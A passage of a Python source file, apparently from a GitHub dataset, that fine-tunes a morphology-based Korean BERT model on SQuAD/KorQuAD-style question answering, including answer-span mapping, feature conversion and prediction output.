"license_type": "no_license",
"max_line_length": 148,
"num_lines": 1196,
"path": "/EtriBERT/runningcode/run_squad_ETRI.py",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Copyright 2018 The Google AI Language Team Authors and The HugginFace Inc. team.\n# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#\t http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ######################################################################\n# 형태소분석 기반 BERT 모델 MRC Fine-tuning 샘플\n# (original: Hugging-face BERT example code)\n# 수정: joonho.lim\n# 일자: 2019-05-27\n#\n\"\"\"Run BERT on SQuAD.\"\"\"\n\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pickle\nimport argparse\nimport collections\nimport logging\nimport json\nimport math\nimport os\nimport random\nimport pickle\nfrom tqdm import tqdm, trange\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.metrics import f1_score\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nfrom torch.utils.data.distributed import DistributedSampler\n\n############################################\n### joonho.lim @ 2019-03-15\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))))\n\nfrom pytorch_pretrained_bert.modeling import BertForQuestionAnswering\nfrom pytorch_pretrained_bert.optimization import BertAdam\nfrom pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE\n\n\n# from utils_squad_evaluate import get_raw_scores\nfrom utils_squad_evaluate import EVAL_OPTS, main as evaluate_on_squad\n\nfrom tokenization_morp import whitespace_tokenize, BasicTokenizer, BertTokenizer\n# from src_tokenizer.tokenization_morp import whitespace_tokenize, BasicTokenizer, BertTokenizer\n\n\n\n\n\n# import evaluate\nimport time\nimport urllib3\n\nlogging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n\t\t\t\t\tdatefmt = '%m/%d/%Y %H:%M:%S',\n\t\t\t\t\tlevel = logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n\n\n# def sentenceTokenizing(content) :\n\t# tokend = Tokenizing[content]\n\t# tokend = tokend[0]\n\t# return tokend\n\nclass SquadExample(object):\n\t\"\"\"A single training/test example for the Squad dataset.\"\"\"\n\n\tdef __init__(self,\n\t\t\t\t qas_id,\n\t\t\t\t q_raw_text,\n\t\t\t\t q_morp_token,\n\t\t\t\t p_raw_text,\n\t\t\t\t p_morp_token,\n\t\t\t\t p_morp_position_list,\n\t\t\t\t a_raw_text=None,\n\t\t\t\t a_morp_token=None,\n\t\t\t\t a_begin_morp=None,\n\t\t\t\t a_end_morp=None):\n\t\tself.qas_id = qas_id\n\t\tself.q_raw_text = q_raw_text\n\t\tself.q_morp_token = q_morp_token\n\t\tself.p_raw_text = p_raw_text\n\t\tself.p_morp_token = p_morp_token\n\t\tself.p_morp_position_list = p_morp_position_list\n\t\tself.a_raw_text = a_raw_text\n\t\tself.a_morp_token = a_morp_token\n\t\tself.a_begin_morp = a_begin_morp\n\t\tself.a_end_morp = a_end_morp\n\t\t\n\t\tself.p_raw_bytes = p_raw_text.encode()\n\t\tself.p_morp_position_list.append ( len(self.p_raw_bytes) )\n\t\t\n\t\t##########################################################\n\t\t### joonho.lim @ 2019-03-15\n\t\t### check difference answer span between answer raw text and morphology anlysis boudary \n\t\tif a_raw_text!= None and a_end_morp != None and len(p_morp_position_list) > a_end_morp :\n\t\t\tbegin_pos = p_morp_position_list[a_begin_morp]\n\t\t\tend_pos = p_morp_position_list[a_end_morp+1]\n\t\t\tpred_answer = self.p_raw_bytes[begin_pos:end_pos].decode().strip()\n\t\t\tif self.a_raw_text != pred_answer :\n\t\t\t\tlogger.info ( \"[diff answer span] %s\\t%s\" % (self.a_raw_text, pred_answer) )\n\n\tdef __str__(self):\n\t\treturn self.__repr__()\n\n\tdef __repr__(self):\n\t\ts = \"\"\n\t\ts += \"qas_id: %s\" % (self.qas_id)\n\t\ts += \", question_text: %s\" % (self.q_raw_text)\n\t\ts += \", doc_text: [%s]\" % (self.p_raw_text)\n\t\tif self.start_position:\ts += \", start_position: %d\" % (self.a_begin_morp)\n\t\tif self.start_position:\ts += \", end_position: %d\" % (self.a_end_morp)\n\t\treturn s\n\n\n\n\nclass InputFeatures(object):\n\t\"\"\"A single set of features of data.\"\"\"\n\n\tdef __init__(self,\n\t\t\t\t unique_id,\n\t\t\t\t example_index,\n\t\t\t\t doc_span_index,\n\t\t\t\t tokens,\n\t\t\t\t token_to_orig_map,\n\t\t\t\t token_is_max_context,\n\t\t\t\t input_ids,\n\t\t\t\t input_mask,\n\t\t\t\t segment_ids,\n\t\t\t\t start_position=None,\n\t\t\t\t end_position=None):\n\t\tself.unique_id = unique_id\n\t\tself.example_index = example_index\n\t\tself.doc_span_index = doc_span_index\n\t\tself.tokens = tokens\n\t\tself.token_to_orig_map = token_to_orig_map\n\t\tself.token_is_max_context = token_is_max_context\n\t\tself.input_ids = input_ids\n\t\tself.input_mask = input_mask\n\t\tself.segment_ids = segment_ids\n\t\tself.start_position = start_position\n\t\tself.end_position = end_position\n\n\t\t\n##########################################################\n### joonho.lim @ 2019-03-15\n### convert language anlysis result to inner data structure\ndef represent_ndoc ( ndoc ) :\n\ttext = ''\n\tmorp_list = []\n\tposition_list = []\n\t\n\tfor sentence in ndoc['sentence'] :\n\t\ttext += sentence['text']\n\t\tbegin_morp_id = len(morp_list)\n\t\t\n\t\tfor morp in sentence['morp'] :\n\t\t\tmorp_list.append( morp['lemma'] + '/' + morp['type'] )\n\t\t\tposition_list.append( int(morp['position']) )\n\t\n\treturn { 'text': text, 'morp_list':morp_list, 'position_list':position_list }\n\t\n\t\n##########################################################\n### joonho.lim @ 2019-03-15\n### convert byte answer position to morphology analysis index\ndef mapping_answer_korquad ( p_json, rep_p, answer_text, answer_start, answer_end=-1 ) :\n\tanswer_start = int(answer_start)\n\tanswer_end = int(answer_end)\n\tif answer_end == -1 :\n\t\tanswer_end = answer_start + len(answer_text)\n\tif answer_text != rep_p['text'][answer_start:answer_end] :\n\t\tlogger.info ( '[mapping_answer_korquad error]\\t%s\\t%s' % (answer_text, rep_p['text'][answer_start:answer_end]) )\n\t\treturn None\n\t\n\tbyte_answer_start = len( rep_p['text'][:answer_start].encode() )\n\tbyte_answer_end = len( rep_p['text'][:answer_end].encode() )\n\t\n\tbase_morp_id = 0\n\tbegin_morp_id = end_morp_id = -1\n\tfor sent_i, sentence in enumerate( p_json['sentence'] ) :\n\t\tif byte_answer_start > sentence['morp'][-1]['position'] and byte_answer_end > sentence['morp'][-1]['position'] :\n\t\t\tbase_morp_id += len(sentence['morp'])\n\t\t\tcontinue\n\t\t\t\n\t\tif begin_morp_id == -1 :\n\t\t\tfor morp_i, morp in enumerate(sentence['morp']) :\n\t\t\t\tif morp['position'] == byte_answer_start :\n\t\t\t\t\tbegin_morp_id = base_morp_id + morp_i\n\t\t\t\t\tbreak\n\t\t\t\telif morp['position'] < byte_answer_start and morp_i+1 < len(sentence['morp']) and byte_answer_start < sentence['morp'][morp_i+1]['position'] :\n\t\t\t\t\tbegin_morp_id = base_morp_id + morp_i\n\t\t\t\t\tlogger.info ('[begin not exact match] %s\\t->\\t%s' % (answer_text, morp['lemma']) )\n\t\t\t\t\tbreak\n\t\t\t\telif morp['position'] > byte_answer_start :\n\t\t\t\t\tbegin_morp_id = base_morp_id + morp_i\n\t\t\t\t\tlogger.info ('[begin error] %s\\t->\\t%s' % (answer_text, morp['lemma']) )\n\t\t\t\t\tbreak\n\t\t\n\t\tif begin_morp_id != -1 and end_morp_id == -1 and byte_answer_end <= sentence['morp'][-1]['position']+len(sentence['morp'][-1]['lemma'].encode()) :\n\t\t\tfor morp_i in range( len(sentence['morp'])-1, -1, -1 ) :\n\t\t\t\tmorp = sentence['morp'][morp_i]\n\t\t\t\tif morp['position'] == byte_answer_end :\n\t\t\t\t\tend_morp_id = base_morp_id + morp_i - 1\n\t\t\t\t\tbreak\n\t\t\t\telif morp['position'] < byte_answer_end and byte_answer_end <= morp['position']+len(morp['lemma'].encode()) :\n\t\t\t\t\tend_morp_id = base_morp_id + morp_i\n\t\t\t\t\tbreak\n\t\t\t\telif morp['position'] < byte_answer_end :\n\t\t\t\t\tend_morp_id = base_morp_id + morp_i\n\t\t\t\t\tlogger.info ('[end error] %s\\t->\\t%s' % (text, morp['lemma']) )\n\t\t\t\t\tbreak\n\t\t\t\n\t\tbase_morp_id += len(sentence['morp'])\n\t\n\tif begin_morp_id == -1 or end_morp_id == -1 :\n\t\treturn None\n\t\n\tp_text_bytes = rep_p['text'].encode()\n\tbegin_pos = rep_p['position_list'][begin_morp_id]\n\tend_pos = len(p_text_bytes)\n\tif end_morp_id+1 < len(rep_p['position_list']): end_pos = rep_p['position_list'][end_morp_id+1]\n\tpred_text = p_text_bytes[ begin_pos : end_pos ].decode().strip()\n\tif answer_text != pred_text :\n\t\tlogger.info ('[check morp index] %s\\t%s' % (answer_text, pred_text) )\n\t\t\n\treturn { 'begin_morp':begin_morp_id, 'end_morp':end_morp_id, 'text':answer_text }\n\t\n\n\n\t\t\n##########################################################\n### joonho.lim @ 2019-03-15\n### do morphology analysis using OpenAPI service\ndef do_lang ( openapi_key, text ) :\n\topenApiURL = \"http://aiopen.etri.re.kr:8000/WiseNLU\"\n\t \n\trequestJson = { \"access_key\": openapi_key, \"argument\": { \"text\": text, \"analysis_code\": \"morp\" } }\n\t \n\thttp = urllib3.PoolManager()\n\tresponse = http.request( \"POST\", openApiURL, headers={\"Content-Type\": \"application/json; charset=UTF-8\"}, body=json.dumps(requestJson) )\n\n\treturn response.data.decode()\n\n\n##########################################################\n### joonho.lim @ 2019-03-15\n### read squad example file and do morphology analysis\n### junho @ using tokenized file for tokenize sentence instead of open API\ndef read_squad_examples_and_do_lang(input_file, is_training, Tokenizing):\n\t\"\"\"Read a SQuAD json file into a list of SquadExample.\"\"\"\n\tif os.path.isfile(input_file) == False :\n\t\traise ValueError(\"not exist file or folder : %s\" % input_file)\n\t\t\n\twith open(input_file, \"r\", encoding='utf-8') as reader:\n\t\tinput_data = json.load(reader)\n\n\tpqa_list = []\n\tfor paragraphs_title in input_data['data'] :\n\t\tfor pq in paragraphs_title['paragraphs'] :\n\t\t\tpassage_text = pq['context']\n\n\t\t\t# origin\n\t\t\t# passage_lang = do_lang( openapi_key, passage_text )\n\t\t\t# junho @ use tokenized file\n\t\t\tpassage_lang = Tokenizing[passage_text][0]\n\n\t\t\tp_json = json.loads(passage_lang)['return_object']\n\t\t\trep_p = represent_ndoc(p_json)\n\n\t\t\tfor qa in pq['qas'] :\n\t\t\t\tqas_id = qa['id']\n\t\t\t\tquestion_text = qa['question'].strip()\n\t\t\t\t# origin\n\t\t\t\t# question_lang = do_lang( openapi_key, question_text )\n\t\t\t\tquestion_lang = Tokenizing[question_text] # 바로 사용 가능\n\t\t\t\t# junho @ use tokenized file\n\t\t\t\tq_json = json.loads(question_lang)['return_object']\n\n\t\t\t\trep_q = represent_ndoc(q_json)\n\t\t\t\t\n\t\t\t\trep_a = {}\n\t\t\t\tif is_training :\n\t\t\t\t\trep_a = mapping_answer_korquad( p_json, rep_p, qa['answers'][0]['text'], qa['answers'][0]['answer_start'] )\n\t\t\t\n\t\t\t\tpqa_list.append( {'id':qas_id, 'passage':rep_p, 'question':rep_q, 'answer':rep_a} )\n\n\n\treturn read_squad_examples(pqa_list, is_training)\n\n\ndef read_squad_examples(input_data, is_training):\n\t\"\"\"Read a SQuAD json file into a list of SquadExample.\"\"\"\n\texamples = []\n\terrorCount=0\n\tfor pqa in input_data :\n\t\ta_raw_text = None\n\t\ta_morp_token = None\n\t\ta_begin_morp = None\n\t\ta_end_morp = None\n\n\n\t\tif pqa['answer'] == None :\n\t\t\terrorCount += 1\n\t\t\tprint(\"데이터 오류 \",errorCount, \" \", pqa['passage'])\n\t\telse :\n\t\t\tif is_training:\n\t\t\t\ta_raw_text = pqa['answer']['text']\n\t\t\t\ta_begin_morp = pqa['answer']['begin_morp']\n\t\t\t\ta_end_morp = pqa['answer']['end_morp']\n\t\t\t\ta_morp_token = pqa['passage']['morp_list'][a_begin_morp : a_end_morp+1]\n\n\t\t\texample = SquadExample(\n\t\t\t\tqas_id = pqa['id'],\n\t\t\t\tq_raw_text = pqa['question']['text'],\n\t\t\t\tq_morp_token = pqa['question']['morp_list'],\n\t\t\t\tp_raw_text = pqa['passage']['text'],\n\t\t\t\tp_morp_token = pqa['passage']['morp_list'],\n\t\t\t\tp_morp_position_list = pqa['passage']['position_list'],\n\t\t\t\ta_raw_text = a_raw_text,\n\t\t\t\ta_morp_token = a_morp_token,\n\t\t\t\ta_begin_morp = a_begin_morp,\n\t\t\t\ta_end_morp = a_end_morp)\n\t\t\texamples.append(example)\n\n\t\tlogger.info( 'len(examples) : %d'% len(examples) )\n\treturn examples\t\t\n\t\t\n\ndef convert_examples_to_features(examples, tokenizer, max_seq_length,\n\t\t\t\t\t\t\t\t doc_stride, max_query_length, is_training, verbose=True):\n\t\"\"\"Loads a data file into a list of `InputBatch`s.\"\"\"\n\n\tunique_id = 1000000000\n\n\tfeatures = []\n\tfor (example_index, example) in enumerate(examples):\n\t\tquery_tokens = []\n\t\tfor q_morp in example.q_morp_token :\n\t\t\tquery_tokens.extend( tokenizer.tokenize(q_morp) )\n\t\tif len(query_tokens) > max_query_length:\n\t\t\tquery_tokens = query_tokens[0:max_query_length]\n\t\t\n\t\ttok_to_orig_index = []\n\t\torig_to_tok_index = []\n\t\tall_doc_tokens = []\n\t\tfor (i, token) in enumerate(example.p_morp_token):\n\t\t\torig_to_tok_index.append(len(all_doc_tokens))\n\t\t\tsub_tokens = tokenizer.tokenize(token)\n\t\t\tfor sub_token in sub_tokens:\n\t\t\t\ttok_to_orig_index.append(i)\n\t\t\t\tall_doc_tokens.append(sub_token)\n\n\t\ttok_start_position = None\n\t\ttok_end_position = None\n\t\tif is_training:\n\t\t\ttok_start_position = orig_to_tok_index[ example.a_begin_morp ]\n\t\t\tif example.a_end_morp+1 < len(orig_to_tok_index) :\n\t\t\t\ttok_end_position = orig_to_tok_index[ example.a_end_morp+1 ] - 1\n\t\t\telse :\n\t\t\t\ttok_end_position = orig_to_tok_index[ -1 ]\n\n\t\t\t\t\n\t\t# The -3 accounts for [CLS], [SEP] and [SEP]\n\t\tmax_tokens_for_doc = max_seq_length - len(query_tokens) - 3\n\n\t\t# We can have documents that are longer than the maximum sequence length.\n\t\t# To deal with this we do a sliding window approach, where we take chunks\n\t\t# of the up to our max length with a stride of `doc_stride`.\n\t\t_DocSpan = collections.namedtuple( # pylint: disable=invalid-name\n\t\t\t\"DocSpan\", [\"start\", \"length\"])\n\t\tdoc_spans = []\n\t\tstart_offset = 0\n\t\twhile start_offset < len(all_doc_tokens):\n\t\t\tlength = len(all_doc_tokens) - start_offset\n\t\t\tif length > max_tokens_for_doc:\n\t\t\t\tlength = max_tokens_for_doc\n\t\t\tdoc_spans.append(_DocSpan(start=start_offset, length=length))\n\t\t\tif start_offset + length == len(all_doc_tokens):\n\t\t\t\tbreak\n\t\t\tstart_offset += min(length, doc_stride)\n\n\t\tfor (doc_span_index, doc_span) in enumerate(doc_spans):\n\t\t\ttokens = []\n\t\t\ttoken_to_orig_map = {}\n\t\t\ttoken_is_max_context = {}\n\t\t\tsegment_ids = []\n\t\t\ttokens.append(\"[CLS]\")\n\t\t\tsegment_ids.append(0)\n\t\t\tfor token in query_tokens:\n\t\t\t\ttokens.append(token)\n\t\t\t\tsegment_ids.append(0)\n\t\t\ttokens.append(\"[SEP]\")\n\t\t\tsegment_ids.append(0)\n\n\t\t\tfor i in range(doc_span.length):\n\t\t\t\tsplit_token_index = doc_span.start + i\n\t\t\t\ttoken_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n\n\t\t\t\tis_max_context = _check_is_max_context(doc_spans, doc_span_index,\n\t\t\t\t\t\t\t\t\t\t\t\t\t split_token_index)\n\t\t\t\ttoken_is_max_context[len(tokens)] = is_max_context\n\t\t\t\ttokens.append(all_doc_tokens[split_token_index])\n\t\t\t\tsegment_ids.append(1)\n\t\t\ttokens.append(\"[SEP]\")\n\t\t\tsegment_ids.append(1)\n\n\t\t\tinput_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n\t\t\t# The mask has 1 for real tokens and 0 for padding tokens. Only real\n\t\t\t# tokens are attended to.\n\t\t\tinput_mask = [1] * len(input_ids)\n\n\t\t\t# Zero-pad up to the sequence length.\n\t\t\twhile len(input_ids) < max_seq_length:\n\t\t\t\tinput_ids.append(0)\n\t\t\t\tinput_mask.append(0)\n\t\t\t\tsegment_ids.append(0)\n\n\t\t\tassert len(input_ids) == max_seq_length\n\t\t\tassert len(input_mask) == max_seq_length\n\t\t\tassert len(segment_ids) == max_seq_length\n\n\t\t\tstart_position = None\n\t\t\tend_position = None\n\t\t\tif is_training:\n\t\t\t\t# For training, if our document chunk does not contain an annotation\n\t\t\t\t# we throw it out, since there is nothing to predict.\n\t\t\t\tdoc_start = doc_span.start\n\t\t\t\tdoc_end = doc_span.start + doc_span.length - 1\n\t\t\t\tif (example.a_begin_morp < doc_start or\n\t\t\t\t\t\texample.a_end_morp < doc_start or\n\t\t\t\t\t\texample.a_begin_morp > doc_end or example.a_end_morp > doc_end):\n\t\t\t\t\tcontinue\n\n\t\t\t\tdoc_offset = len(query_tokens) + 2\n\t\t\t\tstart_position = tok_start_position - doc_start + doc_offset\n\t\t\t\tend_position = tok_end_position - doc_start + doc_offset\n\n\t\t\tif verbose == True and example_index < 10:\n\t\t\t\tlogger.info(\"*** Example ***\")\n\t\t\t\tlogger.info(\"unique_id: %s\" % (unique_id))\n\t\t\t\tlogger.info(\"example_index: %s\" % (example_index))\n\t\t\t\tlogger.info(\"doc_span_index: %s\" % (doc_span_index))\n\t\t\t\tlogger.info(\"tokens: %s\" % \" \".join(tokens))\n\t\t\t\tlogger.info(\"token_to_orig_map: %s\" % \" \".join([\n\t\t\t\t\t\"%d:%d\" % (x, y) for (x, y) in token_to_orig_map.items()]))\n\t\t\t\tlogger.info(\"token_is_max_context: %s\" % \" \".join([\n\t\t\t\t\t\"%d:%s\" % (x, y) for (x, y) in token_is_max_context.items()\n\t\t\t\t]))\n\t\t\t\tlogger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n\t\t\t\tlogger.info(\n\t\t\t\t\t\"input_mask: %s\" % \" \".join([str(x) for x in input_mask]))\n\t\t\t\tlogger.info(\n\t\t\t\t\t\"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n\t\t\t\tif is_training:\n\t\t\t\t\tanswer_text = \" \".join(tokens[start_position:(end_position + 1)])\n\t\t\t\t\tlogger.info(\"start_position: %d\" % (start_position))\n\t\t\t\t\tlogger.info(\"end_position: %d\" % (end_position))\n\t\t\t\t\tlogger.info(\"answer: %s\" % (answer_text))\n\t\t\t\t\tlogger.info(\"orig_answer: %s\" % (example.a_raw_text))\n\n\t\t\tfeatures.append(\n\t\t\t\tInputFeatures(\n\t\t\t\t\tunique_id=unique_id,\n\t\t\t\t\texample_index=example_index,\n\t\t\t\t\tdoc_span_index=doc_span_index,\n\t\t\t\t\ttokens=tokens,\n\t\t\t\t\ttoken_to_orig_map=token_to_orig_map,\n\t\t\t\t\ttoken_is_max_context=token_is_max_context,\n\t\t\t\t\tinput_ids=input_ids,\n\t\t\t\t\tinput_mask=input_mask,\n\t\t\t\t\tsegment_ids=segment_ids,\n\t\t\t\t\tstart_position=start_position,\n\t\t\t\t\tend_position=end_position))\n\t\t\tunique_id += 1\n\n\treturn features\n\n\n\ndef _check_is_max_context(doc_spans, cur_span_index, position):\n\t\"\"\"Check if this is the 'max context' doc span for the token.\"\"\"\n\n\t# Because of the sliding window approach taken to scoring documents, a single\n\t# token can appear in multiple documents. E.g.\n\t# Doc: the man went to the store and bought a gallon of milk\n\t# Span A: the man went to the\n\t# Span B: to the store and bought\n\t# Span C: and bought a gallon of\n\t# ...\n\t#\n\t# Now the word 'bought' will have two scores from spans B and C. We only\n\t# want to consider the score with \"maximum context\", which we define as\n\t# the *minimum* of its left and right context (the *sum* of left and\n\t# right context will always be the same, of course).\n\t#\n\t# In the example the maximum context for 'bought' would be span C since\n\t# it has 1 left context and 3 right context, while span B has 4 left context\n\t# and 0 right context.\n\tbest_score = None\n\tbest_span_index = None\n\tfor (span_index, doc_span) in enumerate(doc_spans):\n\t\tend = doc_span.start + doc_span.length - 1\n\t\tif position < doc_span.start:\n\t\t\tcontinue\n\t\tif position > end:\n\t\t\tcontinue\n\t\tnum_left_context = position - doc_span.start\n\t\tnum_right_context = end - position\n\t\tscore = min(num_left_context, num_right_context) + 0.01 * doc_span.length\n\t\tif best_score is None or score > best_score:\n\t\t\tbest_score = score\n\t\t\tbest_span_index = span_index\n\n\treturn cur_span_index == best_span_index\n\n\n\nRawResult = collections.namedtuple(\"RawResult\",\n\t\t\t\t\t\t\t\t [\"unique_id\", \"start_logits\", \"end_logits\"])\n\n\ndef write_predictions(all_examples, all_features, all_results, n_best_size,\n\t\t\t\t\t max_answer_length, do_lower_case, output_prediction_file,\n\t\t\t\t\t output_nbest_file, verbose_logging):\n\t\"\"\"Write final predictions to the json file.\"\"\"\n\tlogger.info(\"Writing predictions to: %s\" % (output_prediction_file))\n\tlogger.info(\"Writing nbest to: %s\" % (output_nbest_file))\n\n\n\t(all_predictions, all_nbest_json) = get_predictions( \n\t\t\t\t\tall_examples, all_features, all_results, n_best_size,\n\t\t\t\t\t max_answer_length, do_lower_case, verbose_logging )\n\n\n\n\twith open(output_prediction_file, \"w\") as writer:\n\t\twriter.write(json.dumps(all_predictions, indent=4,ensure_ascii=False) + \"\\n\")\n\n\twith open(output_nbest_file, \"w\") as writer:\n\t\twriter.write(json.dumps(all_nbest_json, indent=4,ensure_ascii=False) + \"\\n\")\n\n\n\treturn all_predictions\n\n\ndef get_predictions(all_examples, all_features, all_results, n_best_size,\n\t\t\t\t\t max_answer_length, do_lower_case, verbose_logging):\n\n\texample_index_to_features = collections.defaultdict(list)\n\tfor feature in all_features:\n\t\texample_index_to_features[feature.example_index].append(feature)\n\n\tunique_id_to_result = {}\n\tfor result in all_results:\n\t\tunique_id_to_result[result.unique_id] = result\n\n\t_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name\n\t\t\"PrelimPrediction\",\n\t\t[\"feature_index\", \"start_index\", \"end_index\", \"start_logit\", \"end_logit\"])\n\n\tall_predictions = collections.OrderedDict()\n\tall_nbest_json = collections.OrderedDict()\n\tfor (example_index, example) in enumerate(all_examples):\n\t\tfeatures = example_index_to_features[example_index]\n\n\t\tprelim_predictions = []\n\t\tfor (feature_index, feature) in enumerate(features):\n\t\t\tresult = unique_id_to_result[feature.unique_id]\n\n\t\t\tstart_indexes = _get_best_indexes(result.start_logits, n_best_size)\n\t\t\tend_indexes = _get_best_indexes(result.end_logits, n_best_size)\n\t\t\tfor start_index in start_indexes:\n\t\t\t\tfor end_index in end_indexes:\n\t\t\t\t\t# We could hypothetically create invalid predictions, e.g., predict\n\t\t\t\t\t# that the start of the span is in the question. We throw out all\n\t\t\t\t\t# invalid predictions.\n\t\t\t\t\tif start_index >= len(feature.tokens):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif end_index >= len(feature.tokens):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif start_index not in feature.token_to_orig_map:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif end_index not in feature.token_to_orig_map:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif not feature.token_is_max_context.get(start_index, False):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif end_index < start_index:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tlength = end_index - start_index + 1\n\t\t\t\t\tif length > max_answer_length:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tprelim_predictions.append(\n\t\t\t\t\t\t_PrelimPrediction(\n\t\t\t\t\t\t\tfeature_index=feature_index,\n\t\t\t\t\t\t\tstart_index=start_index,\n\t\t\t\t\t\t\tend_index=end_index,\n\t\t\t\t\t\t\tstart_logit=result.start_logits[start_index],\n\t\t\t\t\t\t\tend_logit=result.end_logits[end_index]))\n\n\t\tprelim_predictions = sorted(\n\t\t\tprelim_predictions,\n\t\t\tkey=lambda x: (x.start_logit + x.end_logit),\n\t\t\treverse=True)\n\n\t\t_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name\n\t\t\t\"NbestPrediction\", [\"text\", \"start_logit\", \"end_logit\"])\n\n\t\tseen_predictions = {}\n\t\tnbest = []\n\t\tfor pred in prelim_predictions:\n\t\t\tif len(nbest) >= n_best_size:\n\t\t\t\tbreak\n\t\t\tfeature = features[pred.feature_index]\n\n\t\t\t##########################################################\n\t\t\t### joonho.lim @ 2019-03-15\n\t\t\t### extract final text\n\t\t\ttok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]\n\t\t\torig_doc_start = feature.token_to_orig_map[pred.start_index]\n\t\t\torig_doc_end = feature.token_to_orig_map[pred.end_index]\n\t\t\t\n\t\t\tp_begin_morp = example.p_morp_position_list[ orig_doc_start ]\n\t\t\tp_end_morp = example.p_morp_position_list[ orig_doc_end+1 ]\n\t\t\t\n\t\t\tfinal_text = example.p_raw_bytes[ p_begin_morp:p_end_morp ].decode().strip()\n\t\t\t\n\t\t\tif final_text in seen_predictions:\n\t\t\t\tcontinue\n\n\t\t\tseen_predictions[final_text] = True\n\t\t\tnbest.append(\n\t\t\t\t_NbestPrediction(\n\t\t\t\t\ttext=final_text,\n\t\t\t\t\tstart_logit=pred.start_logit,\n\t\t\t\t\tend_logit=pred.end_logit))\n\n\t\t# In very rare edge cases we could have no valid predictions. So we\n\t\t# just create a nonce prediction in this case to avoid failure.\n\t\tif not nbest:\n\t\t\tnbest.append(\n\t\t\t\t_NbestPrediction(text=\"empty\", start_logit=0.0, end_logit=0.0))\n\n\t\tassert len(nbest) >= 1\n\n\t\ttotal_scores = []\n\t\tfor entry in nbest:\n\t\t\ttotal_scores.append(entry.start_logit + entry.end_logit)\n\n\t\tprobs = _compute_softmax(total_scores)\n\n\t\tnbest_json = []\n\t\tfor (i, entry) in enumerate(nbest):\n\t\t\toutput = collections.OrderedDict()\n\t\t\toutput[\"text\"] = entry.text\n\t\t\toutput[\"probability\"] = probs[i]\n\t\t\toutput[\"start_logit\"] = entry.start_logit\n\t\t\toutput[\"end_logit\"] = entry.end_logit\n\t\t\tnbest_json.append(output)\n\n\t\tassert len(nbest_json) >= 1\n\n\t\tall_predictions[example.qas_id] = nbest_json[0][\"text\"]\n\t\tall_nbest_json[example.qas_id] = nbest_json\n\n\treturn (all_predictions, all_nbest_json)\n\n\t\ndef get_final_text(pred_text, orig_text, do_lower_case, verbose_logging=False):\n\t\"\"\"Project the tokenized prediction back to the original text.\"\"\"\n\n\t# When we created the data, we kept track of the alignment between original\n\t# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So\n\t# now `orig_text` contains the span of our original text corresponding to the\n\t# span that we predicted.\n\t#\n\t# However, `orig_text` may contain extra characters that we don't want in\n\t# our prediction.\n\t#\n\t# For example, let's say:\n\t# pred_text = steve smith\n\t# orig_text = Steve Smith's\n\t#\n\t# We don't want to return `orig_text` because it contains the extra \"'s\".\n\t#\n\t# We don't want to return `pred_text` because it's already been normalized\n\t# (the SQuAD eval script also does punctuation stripping/lower casing but\n\t# our tokenizer does additional normalization like stripping accent\n\t# characters).\n\t#\n\t# What we really want to return is \"Steve Smith\".\n\t#\n\t# Therefore, we have to apply a semi-complicated alignment heruistic between\n\t# `pred_text` and `orig_text` to get a character-to-charcter alignment. This\n\t# can fail in certain cases in which case we just return `orig_text`.\n\n\tdef _strip_spaces(text):\n\t\tns_chars = []\n\t\tns_to_s_map = collections.OrderedDict()\n\t\tfor (i, c) in enumerate(text):\n\t\t\tif c == \" \":\n\t\t\t\tcontinue\n\t\t\tns_to_s_map[len(ns_chars)] = i\n\t\t\tns_chars.append(c)\n\t\tns_text = \"\".join(ns_chars)\n\t\treturn (ns_text, ns_to_s_map)\n\n\t# We first tokenize `orig_text`, strip whitespace from the result\n\t# and `pred_text`, and check if they are the same length. If they are\n\t# NOT the same length, the heuristic has failed. If they are the same\n\t# length, we assume the characters are one-to-one aligned.\n\ttokenizer = BasicTokenizer(do_lower_case=do_lower_case)\n\n\ttok_text = \" \".join(tokenizer.tokenize(orig_text))\n\n\tstart_position = tok_text.find(pred_text)\n\tif start_position == -1:\n\t\tif verbose_logging:\n\t\t\tlogger.info(\n\t\t\t\t\"Unable to find text: '%s' in '%s'\" % (pred_text, orig_text))\n\t\treturn orig_text\n\tend_position = start_position + len(pred_text) - 1\n\n\t(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)\n\t(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)\n\n\tif len(orig_ns_text) != len(tok_ns_text):\n\t\tif verbose_logging:\n\t\t\tlogger.info(\"Length not equal after stripping spaces: '%s' vs '%s'\",\n\t\t\t\t\t\t\torig_ns_text, tok_ns_text)\n\t\treturn orig_text\n\n\t# We then project the characters in `pred_text` back to `orig_text` using\n\t# the character-to-character alignment.\n\ttok_s_to_ns_map 